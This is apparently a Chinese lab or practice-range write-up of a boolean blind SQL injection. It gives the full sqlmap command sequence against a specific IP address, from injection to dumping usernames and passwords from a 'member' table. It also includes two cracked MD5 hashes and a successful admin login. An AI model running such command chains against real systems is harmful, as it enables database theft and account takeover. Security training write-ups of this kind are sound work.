SQL注入漏洞测试(布尔盲注)

2020年4月9日 0条评论 158次阅读 0人点赞智超

打开页面发现一个登录框。还有一个通知。

直接扔sqlmap里面跑

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1

然后开始爆裤

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 --dbs

接下来就是报表/字段/数据

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup --tables

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap -u http://219.153.49.228:40395/new_list.php?id=1 -D stormgroup -T member -C name,password --dump

然后解码md5

3114b433dece9180717f2b7de56b28a3解(528469)

870a77a3bdc1ff88e85cdcc250d78857解(402315)

登录后台发现第一个被禁用，第二个登录成功

大概就这些。

SQL注入漏洞测试(布尔盲注)

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

发表评论取消回复

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可

发表评论 取消回复

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

发表评论取消回复